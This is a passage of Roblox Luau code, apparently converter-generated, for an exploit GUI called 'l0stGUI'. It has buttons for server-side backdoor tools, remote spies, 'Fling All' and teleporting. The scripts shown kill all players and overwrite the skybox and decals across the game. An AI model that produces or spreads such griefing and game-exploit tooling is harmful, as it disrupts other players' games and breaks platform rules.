G2L["38"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["38"]["Text"] = [[]];


-- StarterGui.ScreenGui.MainFrame.StatSection.ExecuteMusic
G2L["39"] = Instance.new("TextButton", G2L["28"]);
G2L["39"]["TextWrapped"] = true;
G2L["39"]["BorderSizePixel"] = 0;
G2L["39"]["TextSize"] = 14;
G2L["39"]["TextScaled"] = true;
G2L["39"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["39"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 174);
G2L["39"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["39"]["Size"] = UDim2.new(0, 246, 0, 32);
G2L["39"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["39"]["Text"] = [[Play Music]];
G2L["39"]["Name"] = [[ExecuteMusic]];
G2L["39"]["Position"] = UDim2.new(0.05576, 0, 0.73163, 0);


-- StarterGui.ScreenGui.MainFrame.StatSection.ExecuteMusic.LocalScript
G2L["3a"] = Instance.new("LocalScript", G2L["39"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.ExecuteMusic.LocalScript
G2L["3b"] = Instance.new("LocalScript", G2L["39"]);



-- StarterGui.ScreenGui.MainFrame.StatSection.Frame
G2L["3c"] = Instance.new("Frame", G2L["28"]);
G2L["3c"]["BorderSizePixel"] = 0;
G2L["3c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["3c"]["Size"] = UDim2.new(0, 261, 0, 26);
G2L["3c"]["Position"] = UDim2.new(0.02974, 0, -0.0828, 0);
G2L["3c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.StatSection.Frame
G2L["3d"] = Instance.new("Frame", G2L["28"]);
G2L["3d"]["BorderSizePixel"] = 0;
G2L["3d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["3d"]["Size"] = UDim2.new(0, 261, 0, 113);
G2L["3d"]["Position"] = UDim2.new(0.02602, 0, 0.99363, 0);
G2L["3d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MinimizeFrame
G2L["3e"] = Instance.new("Frame", G2L["1"]);
G2L["3e"]["BorderSizePixel"] = 0;
G2L["3e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3e"]["Size"] = UDim2.new(0, 44, 0, 41);
G2L["3e"]["Position"] = UDim2.new(0.76775, 0, 0.15578, 0);
G2L["3e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3e"]["Name"] = [[MinimizeFrame]];
G2L["3e"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.MinimizeFrame.ImageButton
G2L["3f"] = Instance.new("ImageButton", G2L["3e"]);
G2L["3f"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["3f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3f"]["Image"] = [[rbxassetid://113344681360516]];
G2L["3f"]["Size"] = UDim2.new(0, 49, 0, 47);
G2L["3f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MinimizeFrame.ImageButton.LocalScript
G2L["40"] = Instance.new("LocalScript", G2L["3f"]);



-- StarterGui.ScreenGui.SwitchFrame
G2L["41"] = Instance.new("Frame", G2L["1"]);
G2L["41"]["BorderSizePixel"] = 0;
G2L["41"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["41"]["Size"] = UDim2.new(0, 100, 0, 32);
G2L["41"]["Position"] = UDim2.new(0.10109, 0, 0.2196, 0);
G2L["41"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["41"]["Name"] = [[SwitchFrame]];


-- StarterGui.ScreenGui.SwitchFrame.TextButton
G2L["42"] = Instance.new("TextButton", G2L["41"]);
G2L["42"]["TextWrapped"] = true;
G2L["42"]["BorderSizePixel"] = 0;
G2L["42"]["TextSize"] = 14;
G2L["42"]["TextScaled"] = true;
G2L["42"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["42"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["42"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["42"]["BackgroundTransparency"] = 1;
G2L["42"]["Size"] = UDim2.new(0, 100, 0, 32);
G2L["42"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["42"]["Text"] = [[Page Switch]];


-- StarterGui.ScreenGui.SwitchFrame.TextButton.LocalScript
G2L["43"] = Instance.new("LocalScript", G2L["42"]);



-- StarterGui.ScreenGui.Page2
G2L["44"] = Instance.new("Frame", G2L["1"]);
G2L["44"]["Visible"] = false;
G2L["44"]["BorderSizePixel"] = 0;
G2L["44"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["44"]["Size"] = UDim2.new(0, 305, 0, 451);
G2L["44"]["Position"] = UDim2.new(0, 0, 0.25879, 0);
G2L["44"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["44"]["Name"] = [[Page2]];


-- StarterGui.ScreenGui.Page2.Frame
G2L["45"] = Instance.new("Frame", G2L["44"]);
G2L["45"]["BorderSizePixel"] = 0;
G2L["45"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["45"]["Size"] = UDim2.new(0, 305, 0, 26);
G2L["45"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Page2.Frame.TextLabel
G2L["46"] = Instance.new("TextLabel", G2L["45"]);
G2L["46"]["TextWrapped"] = true;
G2L["46"]["BorderSizePixel"] = 0;
G2L["46"]["TextSize"] = 14;
G2L["46"]["TextScaled"] = true;
G2L["46"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["46"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["46"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["46"]["BackgroundTransparency"] = 1;
G2L["46"]["Size"] = UDim2.new(0, 305, 0, 24);
G2L["46"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["46"]["Text"] = [[l0stGUI reborn v5 by l0stk1dd88]];
G2L["46"]["Position"] = UDim2.new(-0.06557, 0, -0.03846, 0);


-- StarterGui.ScreenGui.Page2.Frame.TextLabel
G2L["47"] = Instance.new("TextLabel", G2L["45"]);
G2L["47"]["TextWrapped"] = true;
G2L["47"]["BorderSizePixel"] = 0;
G2L["47"]["TextSize"] = 14;
G2L["47"]["TextScaled"] = true;
G2L["47"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["47"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["47"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["47"]["BackgroundTransparency"] = 1;
G2L["47"]["Size"] = UDim2.new(0, 305, 0, 24);
G2L["47"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["47"]["Text"] = [[More scripts :)]];
G2L["47"]["Position"] = UDim2.new(-0.23279, 0, 0.88462, 0);


-- StarterGui.ScreenGui.Page2.Frame.TextLabel
G2L["48"] = Instance.new("TextLabel", G2L["45"]);
G2L["48"]["TextWrapped"] = true;
G2L["48"]["BorderSizePixel"] = 0;
G2L["48"]["TextSize"] = 14;
G2L["48"]["TextScaled"] = true;
G2L["48"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["48"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["48"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["48"]["BackgroundTransparency"] = 1;
G2L["48"]["Size"] = UDim2.new(0, 305, 0, 24);
G2L["48"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["48"]["Text"] = [[More scripts :)]];
G2L["48"]["Position"] = UDim2.new(0.25246, 0, 0.92308, 0);


-- StarterGui.ScreenGui.Page2.TextButton
G2L["49"] = Instance.new("TextButton", G2L["44"]);
G2L["49"]["TextWrapped"] = true;
G2L["49"]["BorderSizePixel"] = 0;
G2L["49"]["TextSize"] = 14;
G2L["49"]["TextScaled"] = true;
G2L["49"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["49"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["49"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["49"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["49"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["49"]["Text"] = [[Nameless Admin]];
G2L["49"]["Position"] = UDim2.new(0.02623, 0, 0.11308, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["4a"] = Instance.new("LocalScript", G2L["49"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["4b"] = Instance.new("TextButton", G2L["44"]);
G2L["4b"]["TextWrapped"] = true;
G2L["4b"]["BorderSizePixel"] = 0;
G2L["4b"]["TextSize"] = 14;
G2L["4b"]["TextScaled"] = true;
G2L["4b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4b"]["Size"] = UDim2.new(0, 131, 0, 32);
G2L["4b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4b"]["Text"] = [[CTRL Click TP]];
G2L["4b"]["Position"] = UDim2.new(0.54426, 0, 0.11308, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["4c"] = Instance.new("LocalScript", G2L["4b"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["4d"] = Instance.new("TextButton", G2L["44"]);
G2L["4d"]["TextWrapped"] = true;
G2L["4d"]["BorderSizePixel"] = 0;
G2L["4d"]["TextSize"] = 14;
G2L["4d"]["TextScaled"] = true;
G2L["4d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4d"]["Size"] = UDim2.new(0, 131, 0, 32);
G2L["4d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4d"]["Text"] = [[backdoor.exe SS]];
G2L["4d"]["Position"] = UDim2.new(0.5377, 0, 0.20621, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["4e"] = Instance.new("LocalScript", G2L["4d"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["4f"] = Instance.new("TextButton", G2L["44"]);
G2L["4f"]["TextWrapped"] = true;
G2L["4f"]["BorderSizePixel"] = 0;
G2L["4f"]["TextSize"] = 14;
G2L["4f"]["TextScaled"] = true;
G2L["4f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4f"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["4f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4f"]["Text"] = [[Dark DEX Explorer]];
G2L["4f"]["Position"] = UDim2.new(0.02623, 0, 0.20621, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["50"] = Instance.new("LocalScript", G2L["4f"]);



-- StarterGui.ScreenGui.Page2.Frame
G2L["51"] = Instance.new("Frame", G2L["44"]);
G2L["51"]["BorderSizePixel"] = 0;
G2L["51"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["51"]["Size"] = UDim2.new(0, -10, 0, 424);
G2L["51"]["Position"] = UDim2.new(0.51475, 0, 0.05765, 0);
G2L["51"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Page2.TextButton
G2L["52"] = Instance.new("TextButton", G2L["44"]);
G2L["52"]["TextWrapped"] = true;
G2L["52"]["BorderSizePixel"] = 0;
G2L["52"]["TextSize"] = 14;
G2L["52"]["TextScaled"] = true;
G2L["52"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["52"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["52"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["52"]["Size"] = UDim2.new(0, 131, 0, 32);
G2L["52"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["52"]["Text"] = [[Fling All]];
G2L["52"]["Position"] = UDim2.new(0.5377, 0, 0.29047, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["53"] = Instance.new("LocalScript", G2L["52"]);



-- StarterGui.ScreenGui.Page2.Frame
G2L["54"] = Instance.new("Frame", G2L["44"]);
G2L["54"]["BorderSizePixel"] = 0;
G2L["54"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["54"]["Size"] = UDim2.new(0, -10, 0, 450);
G2L["54"]["Position"] = UDim2.new(1.03279, 0, -0.00044, 0);
G2L["54"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Page2.Frame
G2L["55"] = Instance.new("Frame", G2L["44"]);
G2L["55"]["BorderSizePixel"] = 0;
G2L["55"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 255);
G2L["55"]["Size"] = UDim2.new(0, -10, 0, 451);
G2L["55"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Page2.TextButton
G2L["56"] = Instance.new("TextButton", G2L["44"]);
G2L["56"]["TextWrapped"] = true;
G2L["56"]["BorderSizePixel"] = 0;
G2L["56"]["TextSize"] = 14;
G2L["56"]["TextScaled"] = true;
G2L["56"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["56"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["56"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["56"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["56"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["56"]["Text"] = [[StellySpy V3]];
G2L["56"]["Position"] = UDim2.new(0.02623, 0, 0.29268, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["57"] = Instance.new("LocalScript", G2L["56"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["58"] = Instance.new("TextButton", G2L["44"]);
G2L["58"]["TextWrapped"] = true;
G2L["58"]["BorderSizePixel"] = 0;
G2L["58"]["TextSize"] = 14;
G2L["58"]["TextScaled"] = true;
G2L["58"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["58"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["58"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["58"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["58"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["58"]["Text"] = [[TurtleSpy]];
G2L["58"]["Position"] = UDim2.new(0.02623, 0, 0.38803, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["59"] = Instance.new("LocalScript", G2L["58"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["5a"] = Instance.new("TextButton", G2L["44"]);
G2L["5a"]["TextWrapped"] = true;
G2L["5a"]["BorderSizePixel"] = 0;
G2L["5a"]["TextSize"] = 14;
G2L["5a"]["TextScaled"] = true;
G2L["5a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5a"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["5a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5a"]["Text"] = [[Backdoor Scanner]];
G2L["5a"]["Position"] = UDim2.new(0.54426, 0, 0.38581, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["5b"] = Instance.new("LocalScript", G2L["5a"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["5c"] = Instance.new("TextButton", G2L["44"]);
G2L["5c"]["TextWrapped"] = true;
G2L["5c"]["BorderSizePixel"] = 0;
G2L["5c"]["TextSize"] = 14;
G2L["5c"]["TextScaled"] = true;
G2L["5c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5c"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["5c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5c"]["Text"] = [[Empty]];
G2L["5c"]["Position"] = UDim2.new(0.54754, 0, 0.4745, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["5d"] = Instance.new("LocalScript", G2L["5c"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["5e"] = Instance.new("TextButton", G2L["44"]);
G2L["5e"]["TextWrapped"] = true;
G2L["5e"]["BorderSizePixel"] = 0;
G2L["5e"]["TextSize"] = 14;
G2L["5e"]["TextScaled"] = true;
G2L["5e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5e"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["5e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5e"]["Text"] = [[Empty]];
G2L["5e"]["Position"] = UDim2.new(0.54754, 0, 0.56541, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["5f"] = Instance.new("LocalScript", G2L["5e"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["60"] = Instance.new("TextButton", G2L["44"]);
G2L["60"]["TextWrapped"] = true;
G2L["60"]["BorderSizePixel"] = 0;
G2L["60"]["TextSize"] = 14;
G2L["60"]["TextScaled"] = true;
G2L["60"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["60"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["60"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["60"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["60"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["60"]["Text"] = [[Empty]];
G2L["60"]["Position"] = UDim2.new(0.54754, 0, 0.65632, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["61"] = Instance.new("LocalScript", G2L["60"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["62"] = Instance.new("TextButton", G2L["44"]);
G2L["62"]["TextWrapped"] = true;
G2L["62"]["BorderSizePixel"] = 0;
G2L["62"]["TextSize"] = 14;
G2L["62"]["TextScaled"] = true;
G2L["62"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["62"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["62"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["62"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["62"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["62"]["Text"] = [[Empty]];
G2L["62"]["Position"] = UDim2.new(0.54754, 0, 0.75388, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["63"] = Instance.new("LocalScript", G2L["62"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["64"] = Instance.new("TextButton", G2L["44"]);
G2L["64"]["TextWrapped"] = true;
G2L["64"]["BorderSizePixel"] = 0;
G2L["64"]["TextSize"] = 14;
G2L["64"]["TextScaled"] = true;
G2L["64"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["64"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["64"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["64"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["64"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["64"]["Text"] = [[Empty]];
G2L["64"]["Position"] = UDim2.new(0.54754, 0, 0.85588, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["65"] = Instance.new("LocalScript", G2L["64"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["66"] = Instance.new("TextButton", G2L["44"]);
G2L["66"]["TextWrapped"] = true;
G2L["66"]["BorderSizePixel"] = 0;
G2L["66"]["TextSize"] = 14;
G2L["66"]["TextScaled"] = true;
G2L["66"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["66"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["66"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["66"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["66"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["66"]["Text"] = [[Empty]];
G2L["66"]["Position"] = UDim2.new(0.02623, 0, 0.85588, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["67"] = Instance.new("LocalScript", G2L["66"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["68"] = Instance.new("TextButton", G2L["44"]);
G2L["68"]["TextWrapped"] = true;
G2L["68"]["BorderSizePixel"] = 0;
G2L["68"]["TextSize"] = 14;
G2L["68"]["TextScaled"] = true;
G2L["68"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["68"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["68"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["68"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["68"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["68"]["Text"] = [[Empty]];
G2L["68"]["Position"] = UDim2.new(0.02623, 0, 0.75388, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["69"] = Instance.new("LocalScript", G2L["68"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["6a"] = Instance.new("TextButton", G2L["44"]);
G2L["6a"]["TextWrapped"] = true;
G2L["6a"]["BorderSizePixel"] = 0;
G2L["6a"]["TextSize"] = 14;
G2L["6a"]["TextScaled"] = true;
G2L["6a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6a"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["6a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6a"]["Text"] = [[Empty]];
G2L["6a"]["Position"] = UDim2.new(0.02623, 0, 0.65632, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["6b"] = Instance.new("LocalScript", G2L["6a"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["6c"] = Instance.new("TextButton", G2L["44"]);
G2L["6c"]["TextWrapped"] = true;
G2L["6c"]["BorderSizePixel"] = 0;
G2L["6c"]["TextSize"] = 14;
G2L["6c"]["TextScaled"] = true;
G2L["6c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6c"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["6c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6c"]["Text"] = [[Empty]];
G2L["6c"]["Position"] = UDim2.new(0.02623, 0, 0.56541, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["6d"] = Instance.new("LocalScript", G2L["6c"]);



-- StarterGui.ScreenGui.Page2.TextButton
G2L["6e"] = Instance.new("TextButton", G2L["44"]);
G2L["6e"]["TextWrapped"] = true;
G2L["6e"]["BorderSizePixel"] = 0;
G2L["6e"]["TextSize"] = 14;
G2L["6e"]["TextScaled"] = true;
G2L["6e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6e"]["Size"] = UDim2.new(0, 130, 0, 32);
G2L["6e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6e"]["Text"] = [[Empty]];
G2L["6e"]["Position"] = UDim2.new(0.02623, 0, 0.4745, 0);


-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
G2L["6f"] = Instance.new("LocalScript", G2L["6e"]);



-- StarterGui.ScreenGui.ToggleFrame
G2L["70"] = Instance.new("Frame", G2L["1"]);
G2L["70"]["BorderSizePixel"] = 0;
G2L["70"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["70"]["Size"] = UDim2.new(0, 120, 0, 31);
G2L["70"]["Position"] = UDim2.new(0, 0, 0.2196, 0);
G2L["70"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["70"]["Name"] = [[ToggleFrame]];


-- StarterGui.ScreenGui.ToggleFrame.TextButton
G2L["71"] = Instance.new("TextButton", G2L["70"]);
G2L["71"]["TextWrapped"] = true;
G2L["71"]["BorderSizePixel"] = 0;
G2L["71"]["TextSize"] = 14;
G2L["71"]["TextScaled"] = true;
G2L["71"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["71"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["71"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["71"]["BackgroundTransparency"] = 1;
G2L["71"]["Size"] = UDim2.new(0, 121, 0, 32);
G2L["71"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["71"]["Text"] = [[Close/open stat menu toggle]];
G2L["71"]["Position"] = UDim2.new(-0, 0, 0, 0);


-- StarterGui.ScreenGui.ToggleFrame.TextButton.LocalScript
G2L["72"] = Instance.new("LocalScript", G2L["71"]);



-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_9()
local script = G2L["9"];
	local Players = game:GetService("Players")
	local LocalPlayer = Players.LocalPlayer
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local char = LocalPlayer.Character
		if char and char:FindFirstChild("Humanoid") then
			char.Humanoid.Health = 0
		end
	
		-- Attempt to kill all players (only works in FD or exploitable games)
		for _, player in pairs(Players:GetPlayers()) do
			if player.Character and player.Character:FindFirstChild("Humanoid") then
				player.Character.Humanoid.Health = 0
			end
		end
	end)
end;
task.spawn(C_9);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_b()
local script = G2L["b"];
	local button = script.Parent
	
	local decalId = "93848128951517" -- Replace with your own valid image ID
	local asset = "rbxassetid://" .. 93848128951517
	
	button.MouseButton1Click:Connect(function()
		-- Remove existing skyboxes
		for _, v in pairs(game.Lighting:GetChildren()) do
			if v:IsA("Sky") then v:Destroy() end
		end
	
		-- Create and apply new skybox
		local skybox = Instance.new("Sky")
		skybox.Name = "CustomSky"
		skybox.SkyboxBk = asset
		skybox.SkyboxDn = asset
		skybox.SkyboxFt = asset
		skybox.SkyboxLf = asset
		skybox.SkyboxRt = asset
		skybox.SkyboxUp = asset
		skybox.Parent = game.Lighting
	end)
end;
task.spawn(C_b);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_d()
local script = G2L["d"];
	local button = script.Parent
	
	-- Replace with your desired decal ID
	local decalId = "136865247774102"
	local asset = "rbxassetid://" .. 136865247774102
	
	-- All six faces of a part
	local faces = {
		Enum.NormalId.Front,
		Enum.NormalId.Back,
		Enum.NormalId.Top,
		Enum.NormalId.Bottom,
		Enum.NormalId.Left,
		Enum.NormalId.Right
	}
	
	button.MouseButton1Click:Connect(function()
		for _, part in ipairs(workspace:GetDescendants()) do
